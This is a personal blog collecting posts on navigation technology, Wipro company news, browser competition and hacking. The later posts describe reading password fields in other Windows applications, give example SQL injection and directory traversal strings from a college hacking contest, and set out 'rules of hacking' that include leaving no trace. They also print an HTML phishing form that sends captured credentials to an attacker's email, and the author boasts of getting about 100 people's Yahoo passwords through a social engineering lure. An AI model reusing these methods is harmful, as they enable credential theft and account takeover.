Map and Navigation

[Integrating my blogs into one blog: This post is copied from my other blog]
“The Google Earth” is revolutionizing the Navigation Technology. The next era will be of the devices equipped with the GPS and full featured map database which will direct us through the cities. Till now the HP’s iPaq is bringing a basic form of this technology. But I hope this technology will evolve further so that the every car’s wind shield will be a transparent LCD screen where the Driver will see the Map of the City as well as the traffic right in front of him.

Imagine that your car tells you following information

  1. How much more time left to reach your destination.
  2. Till now what was your Avg Speed (from certaing point)
  3. In Which Direction your Car is going.
  4. What are the route available for destination and their traffic conditions.
  5. In Real Time which path is the best path depending upon your preferences (Time/Distance)
  6. Where is nearest Hotel/Hospital/Shop where i will get this product/service.
  7. Where is petrol bunk so that i can refuel.
  8. And so on many things

Wipro related news of this week

The unicorn is a legendary creature with the body of a horse, but with a single — usually spiral — horn growing out of its forehead (whence its name—cornus being Latin for 'horn')

Hi friends
One thing is very peculiar about wipro is that its media presence is very bursty. I mean some time a week long you will not get any news about wipro and some times you will get lots of news about wipro. Here is the week where i saw some 3 to 4 news about wipro....
I am posting those news here.

Wipro acquires Quantech Global
Wipro Technologies, the global IT services division of Wipro Limited, on Monday, announced plans to acquire Quantech Global Services in an all cash deal, for an undisclosed amount.
The consideration includes an upfront cash payment on closure of the transaction as well as an earn-out on achieving agreed financial targets over three years, said Chief Operating Officer, Wipro Technologies, D L Rao.
Mr Rao said Quantech is a leading provider of computer aided design (CAD) and engineering services to fortune 500 companies in the automotive, aerospace and consumer goods industries.




Wipro to develop Rs 200 cr campus in Vizag
Chief Minister YS Rajasekhara Reddy today laid the foundation stone for a Rs 200 crore Wipro Technologies campus at Vishakhapatnam.Wipro will invest the amount over the next four-five years in its campus, coming up on the seven acre land the Andhra Pradesh government has allotted to the IT major for a nominal cost.The allocation of land is in part of Andhra's bid to promote IT industry in the state.According to A Lakshman Rao, chief operating officer of Wipro, the company initially investment Rs 25 crore, and hire about 750 employees."We have plans to expand our activity by investing about Rs 200 crore over the next four-five years and create 6,000 jobs," he added.


Wipro chief sees rise in Indian R&D
"The U.S. will graduate more sports therapists this year than engineers," Azim Premji, chairman of Wipro, said at the Future in Review conference here Monday. "Engineering and medicine are the two most preferred professions in India, by far."

Software services still account for the largest percentage of Wipro's revenue, at about 60 percent, Premji said. But the company has become the world's largest independent provider of research and development services for other companies, and it hopes that the segment will account for 40 percent to 45 percent of Wipro's revenue over the next few years, Premji said in a brief interview following his public discussion with Rafiq Dossani, a senior research scholar at Stanford University.

Wipro, Oracle deploy online surveillance system in BSE

Wipro and Oracle recently implemented phase – I of the BSE’s Online Surveillance System-integrated (BOSS-i). BOSS-i caters to Bombay Stock Exchange’s (BSE) complex market vigilance requirements and promotes market integrity by providing a capturing trading data in Equities & Derivatives market.


Bye for now..... Actually my exams are going on these days......



Future is Browser

[Integrating my blogs into one blog: This post is copied from my other blog]
Google has declared the war against microsoft by offering money to those site who will put the "Download Firefox" add. This is more important because its timing, this news came soon after the release of IE7(beta) by Microsoft.


I think the browser and http technology is yet to evolve. Application software will be going to be the fully web enabled. And that is why the role of browser is crucial and person who will win the browser race will be overall winner.

Google’s 'Explorer Destroyer'


Google’s 'Explorer Destroyer' movement aims IE

Google has lunched Explorer Destroyer campaign. Here in this blog I have quoted the various texts from different sources that says some thing very much interesting .

What is It?

According to the Explorer Destroyer Web site, the group offers Web-site owners scripting technology that detects whether a visitor is running IE. If so, an alert will appear advising the visitor to download Firefox so they can either view the site better or view it at all. Whenever a visitor to a Web site using the group's technology switches to Firefox from IE, the owner of the Web site will get the referral fee if they have signed up for.


How it works?

According to the Explorer Destroyer Web site, the group offers Web-site owners scripting technology that detects whether a visitor is running IE. If so, an alert will appear advising the visitor to download Firefox so they can either view the site better or view it at all. Whenever a visitor to a Web site using the group's technology switches to Firefox from IE, the owner of the Web site will get the referral fee if they have signed up for Google's AdSense program.

There are three types of alerts site owners can put on their page--"gentle encouragement," "semi-serious," or "dead serious."

If a Web site owner chooses "gentle encouragement," site visitors who are using IE will see a banner across the top of the page that encourages them to download Firefox. A "semi-serious" site will put up a splash page encouraging a user to download Firefox, with a link for downloading Mozilla's browser as well as a link to the Web site.

Those who choose the "dead serious" alert actually block users with IE from viewing the page, informing them they must install Firefox to view the site. View a demo of what happens when a user clicks on a site with this rating.


Reactions



"Everyone likes a good horse race--even when the race is fixed. That's about how I see the supposed race between Internet Explorer and Firefox. Ever since IE was included with Microsoft's operating system, its dominance has pretty much been a done deal. But that doesn't mean the front-runner should sit back and rest on its laurels. And up until now, that's what Microsoft has been doing."

"Just as IBM finally got that suits and white shirts and shiny shoes don't project a friendly image at trade shows, Microsoft seems to have finally understood that just shipping a browser along with its OS isn't going to guarantee that people will use it. So as Ed Bott reveals in "IE7 For XP Beta 2: Has Firefox Met Its Match?" Redmond has added a few interesting features to its venerable browser, such as tabbing and some additional security protection. (Which it needs--IE is still the number-one target of malware writers.)"


"I think IE 7 brings the browser to parity with Firefox in terms of features, and the security is a big improvement over IE 6," said Matt Rosoff, an analyst with Directions on Microsoft "I think it will be good enough to stop some of IE's market share loss to Firefox."

However, Microsoft's history is replete with examples of the company using its financial and distribution muscle to overpower smaller competitors. It used such tactics with devastating effect in the first round of the browser wars in the 1990's, when it challenged the once dominant Netscape browser and eventually drove it out of business.

Information Week ran a comprehensive test of both browsers and concluded that Firefox was still slightly ahead especially for technology savvy users like programmer Mitchell Adams.

Microsoft Windows: Window mechanism has flaw

"The GetWindowText function copies the text of the specified window's title bar (if it has one) into a buffer. If the specified window is a control, the text of the control is copied. However, GetWindowText cannot retrieve the text of a control in another application."

This is what described about the GetWindowText API in MSDN Documentation. GetWindowText API can not retrieve the text of a control in some other application. But this restriction was introduced since the Windows 2k/XP. So in XP and 2K you can not retrieve the text of a password control from other application. So to overcome this restriction many applications like PasswordSpy uses dll injection technique on Xp and 2kp versions. Now I found another way that can be easy than dll injection to retrieve the text of window controls of some other application.

The CloseWindow function minimizes (but does not destroy) the specified window.

BOOL CloseWindow(

  HWND hWnd   // handle to window to minimize

);

CloseWindow function minimizes the windows whose handle is provided as argument. Even it can minimize the control window of some other application (process). Now flaw of windows mechanism is that whenever a window is minimized it shows its text as its minimized caption. So if you will minimize the password control of some other application by calling CloseWindow api you can see the password of the that particular window (control). So no more need of dll injection for spying the password.

Wipro Q4 net profit


Wipro Q4 net profit has rose 43% on a year-on-year basis. The company today reported a consolidated net of Rs 617.90 crore for the quarter ended March 2006 when compared to Rs 433 crore in the corresponding quarter a year ago. The Q4 total income increased 35% to Rs 3,113.20 crore from Rs 2,312.10 crore in a year ago period

For Year 2006 (FY06) consolidated net profit was up 27% at Rs 2,067.40 crore from Rs 1,628.50 crore in FY05. The total income grew 30% to Rs 10,625.80 crore as against Rs 8,169.80 crore.

The company's board has proposed a final dividend of Rs 5 per share.

Azim Premji, chairman of Wipro, said: "We look back at our performance in 2005-06 with immense satisfaction. It was a year in which we crossed several landmarks - including Rs 10,000 crore in total revenue, $2 billion mark in IT business revenue, Rs 500 crore quarterly profit, 5% revenue contribution from innovation initiatives and team size of 50,000. With all Wipro businesses delivering industry-leading growth rates, we were able to post record revenue and profit growth. Looking ahead, for the quarter ending June 2006, we expect revenue from global IT services business to be approximately $533 million."

This is great news for me. Basically I don’t know how these results are going to affect us. but one thing is sure that these result will be encouraging for the employees and shareholders, and also for me since I have to join Wipro in next June/July as a trainee.

I am tracking wipro's results since the day i was placed in the Wipro. I saw this year's Q2, Q3 and now Q4 results.

The Q2 result was not that much encouraging because the rival companies (like Infosys and TCS) made more profit than wipro.

The Q3 result was bit encouraging. in fact the results were better than rival compainies on %tage basis. since we can not compare the infosys and TCS on the absolute basis as there net capital is more that that of Wipro.

Between the Q3 and Q4 Wipro made some of the acquisitions. You can read my quoted text which wrote in my yahoo 360 blog.
"It's a takeover week for Wipro. After lying low for almost two years, Wipro is deep into the acquisition mode and has devoured two companies within four days. On Thursday (December 22, 2005), it acquired New Jersey-based mPower Inc, for all cash payout of $28 million, even before the ink had dried on its three-day old $56 million purchase of Austria-based NewLogic.In a space of just one week, it has shelled out nearly $100 million to entrench itself well into the financial services (mPower) and wireless design (NewLogic) sectors. "

Wipro also bagged the 300b deal from GM and Rs360 crore outsourcing deal with HDFC Bank.

Now in q4 the results are really encouraging......

Google Page Creator

After a long time, I found this service of Google on which I want to put some comment. Since Google expanding its business area and its started many service. like Gmail, Personalized Search, Google Earth,Google Reader, Google Analytics... and much more.

All these services are really amazing....

I think at least 4 weeks ago I came to know that the Google have launched its new service Google Page creator from its site http://labs.google.com. I immediately rushed to get the service but I disappointed to know that the service in not opened for all due to resource problem. No Problem!! I have submitted my request for it., and yesterday I got the mail from Google that now I can get the Page Creator Service.

I started with lot of enthusiasm and excitement but I found that this service got nothing new except the browser embedded editor and a space to host your personal pages.

I think now the Google become the same old kind of company who always brings the older concepts to business. I mean I didn’t find any thing interested in this new service of Google.

Hacking Contest

Hi all,
Last few days were very hectic for me because I was preparing the website for hacking contest to be organized in my college. The website that I have built could be one of the best examples of my programming skill. Before building it I listed all kinds of the scenario that may happen during the contest, so in taking care of everything I have built this web application in ASP.net. Website had total 10 levels of increasing complexity. Here in this article i have discussed those 10 levels.

Level-0
At level zero it was nothing to do. Here I put the password of the level in comment of the html source of the page. So anybody who will go to see the html source can pass this level.
Level-1
Level-1 was very similar to level-0 the only difference was that instead of the keeping the password in source of html I gave the link of the password. i.e I kept the password in pass.txt in the current directory and written this information in comment of the html source.
Level-2
level-2 was also a very easy level in which u need to edit the query string of the URL to advance in the next round. The level URL was like this.
http://myhackingsite/level2.aspx?advance=no
you need to make it like this to advance
http://myhackingsite/level2.aspx?advance=yes

Level-3
level 3 was about the encryption that uses substitution cipher technique. most of the people can easily go through this level.
Level-4
it was about the buffer overflow. u must overflow the buffer length to get error message. This will show u the password.
Level-5
Level 5 uses the XOR based encryption.
let P is your plain text
and C is your cipher(encrypted text)
and K is your key.

then
C=K XOR P
which can be also written as
K= C XOR P (read xor technique)
here you can get key from using cipher and plaintext


Level-6
This level was about breaking the secret function based authentication technique. Probably you can know about this level by reading about the reflection attack.
Level-7
this level was based on the XSS (cross site scripting) concept. I have put some information in one of the cookie so that hacker can use that information to pass this level.
Level-8
the level 8 was based on the concept of SQL injection.
means
you have to break my code which was like this

String str= "select count(*) from user where username='"+text1.text+"' and password='"+text2.text+"'";
if(cmd.ExecuteScalar()>0)
{
//Authentic User
}
else
{
//wrong username or password
}
check what will happen if i will inter the following string in text1.text
' or 1==1 ---

Level-9
this level was about the directory traversal attack.
Means
ASP page shows the text from file intsruction.txt
using URL like
http://myhackingsite/level2.aspx?file=intsruction.txt
using this u can see some critical file using URLs like
http://myhackingsite/level2.aspx?file=../../../windows/system32/criticalfile.txt
level 9 was the last level of the contest




Anatomy Of Hack

There are some generic ways that a hacker follows to hack in to the private network. In this article I described a generic way that has been long followed by the most of the hackers all around the world. Today’s private networks are hard and very much secured from outside so that it becomes very difficult for the hackers to get in to the network, but once you will get a small hole into the corporate firewall certainly you can hack into the network. Since the rest of the internal network is very soft. This is very similar to the egg shell which is very hard from outside but very soft from inside.
Foot printing
the first step that a hacker follows in hacking is Foot printing. Where hacker identifies that the target that he needs to attack. In this step he finds the list of available computers that can be hacked. In this step hacker may enumerate the computers present on his network or he may get the IP of the target system by some other means. He may get the IP of target system from some of the internal employee.


Scanning
In second step hacker scans the target system. Like he scans the ports, finds the MAC-address of the target system

Information Gathering
the third step of hacking is Information Gathering. in this stage hacker tries to get as much information as possible about the target system. he finds the operating system running on the target machine, services running on the target machine that can be exploited and much more. This is the right step for the hacker to get some of the user name that has probably the blank password or a password that can be easily guessed.

Gaining Access

the access gaining step is the next step that a hackers does after the Information gathering phase. He gains access on the target machine by means of some exploits which may be the blank/default password of some user or it may be application vulnerability. Like buffer overflow exploit that has been used by hacker most of the time to gain access on the vulnerable machines. In history the access gained using many technique including XSS (cross site scripting) and SQL injection attack.

Escalating Privilege
In case when the access gained in previous step is not privileged enough, hacker tries to escalate his privileges by means of exploiting the application level vulnerability. This is one of the most difficult phases of the hacking.

Pilfering
once the hacker got the right privilege on the target machine he starts pilfering the required information from the machine. In this phase hacker may harm the target machine.


Denial of Service
when hackers not able to gain access on the target machine or he is not able to escalate his privileges he attacks the system for denial of service. This hacker does when he gets frustrated of the hardness of system. This is not going to benefit the hacker in any sense.

Reference
http://www.microsoft.com/technet/technetmag/issues/2005/01/AnatomyofaHack/




Rule of Hacking

There are some rules i believe that must to be followed when you are Hacking.
follow these dont's and do's of hacking.

Dont's of Hacking
  1. Do not do in same way as others do.
  2. Do not use tool for hacking unless you know its complete working.
  3. Do not leave any trace.
  4. Do not delete or change any data which can harm or causes loss to victim.(Ethically do not harm your victim)
Do's of hacking
  1. Do in all possible ways

Yahoo Hacking Bot


Hi Guys,
Today I am going to discuss about what I did on last week. Before this let me tell you that I am very much interested in hacking. I mean I want to learn hacking techniques that was used in history by other hackers. In this series, in previous week I was searching about what are all the techniques that were used for the hackers to hack the online web mail accounts like Yahoo.

So I googled and found a very few techniques that were used. The most of the techniques are all known to me like Key-loggers, Dummy pages and Social Engineering. Last week using social engineering technique I got the password of nearly 100 people on the net. Now let me tell you that how these three techniques works and how can you defend yourself.

Key-Loggers

The key loggers are very cheap kind of hacking utility that is used by script kiddies. It’s software that logs every key press on a particular machine. So using this you can record the keys and u can get password of any kind of form based authentication scheme, Irrespective of the authentication technique used by your server program. Form based authentication means the authentication scheme is scheme that takes user name and password from user.

So may be your friend will install a key logger on your machine when you are away from your machine (that is left open). Key loggers are can also be presents on Internet Café Machine.

Dummy Pages

Dummy pages are the false login page that looks very similar to original page and that is having some different Action value. Means it will be a fake HTML form page whose post method will be set to post and action will be configured in such a way that when you submit the information it will be sent to some e-mail Id. This may be the case that you will try to login on these pages and your password will be posted to your friend’s (hacker) email.

Here is a simple example of Dummy page



<form action="Your SMTP URL" method="POST">
<input type="Hidden" name="to" value="Your email Id">
<input type="Hidden" name="subject" value="Subject of email ">
<input type="text" name="user" value="">
<input type="text" name="pass" value="">
<input type="submit" name="submitbutton" value="">
</form>


Social Engineering

The last method that I come across was a social Engineering which deceives the user by telling them a very easy method to hack yahoo which describes like this.

1.First send a letter to hack_mit_bot@yahoo.com, second within the
Subject heading place the word "Password".
2. Then in the text field place the YahooID of the person that you
want to hack in small letters.
3.Then and place your own yahoo account information such as: "My
login:My password" (a semicolon makes it easier for the bot to
recognize). This way the bot can verify that your account actually
exists. And then supplies you with the password for the person's
account that you want it for. Here is example:

To: hack_mit_bot@yahoo.com
Cc:
Bcc:
Subject: Password

YourYahooID@yahoo.co.in:>

So all the people who want to hack someone Yahoo ID will be hacked itself.

Can you believe this, this method is posted on the internet few years back but still I got many Idiots who sent me their password.

Reality

If anyone a claim that he can get your yahoo password is either dam fool or he is dam intelligent who can really hack the existing algorithms. Why I am telling this because the password stored on the yahoo server is neither exactly your plain password nor its encrypted password, but it’s the hash of your password that can not be decrypted back unless you crack it by some brute force attack. So guys even the yahoo administrator can not get your password.

But if someone still hacking your yahoo mail it’s totally due to your mistake. I mean either you logged on the machine which has keyboard logger or you entered your password on some dummy page.

So be claver enough that someone can not hack your password.